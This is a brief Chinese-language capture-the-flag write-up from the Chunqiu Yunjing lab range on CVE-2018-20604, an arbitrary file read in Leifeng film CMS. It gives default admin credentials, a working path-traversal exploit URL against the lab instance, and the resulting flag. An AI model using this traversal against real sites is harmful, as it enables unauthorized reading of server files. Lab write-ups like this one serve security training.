春秋云镜 CVE-2018-20604 lfdycms任意文件读取

靶标介绍

雷风影视CMS是一款采用PHP基于THINKPHP3.2.3框架开发，适合各类视频、影视网站的影视内容管理程序，该CMS存在缺陷，可以通过 admin.php?s=/Template/edit/path/web………*…*1.txt 的方式读取任意文件。

启动场景

漏洞利用

进入管理后台/admin.php，admin/admin登陆。
exp

http://eci-2ze7a4y81t7zej4hh4wv.cloudeci1.ichunqiu.com/admin.php?s=/Template/edit/path/*web*..*..*..*..*..*..*flag

得到flag

flag{48c9f809-3233-4d1a-85de-7233a4bd202d}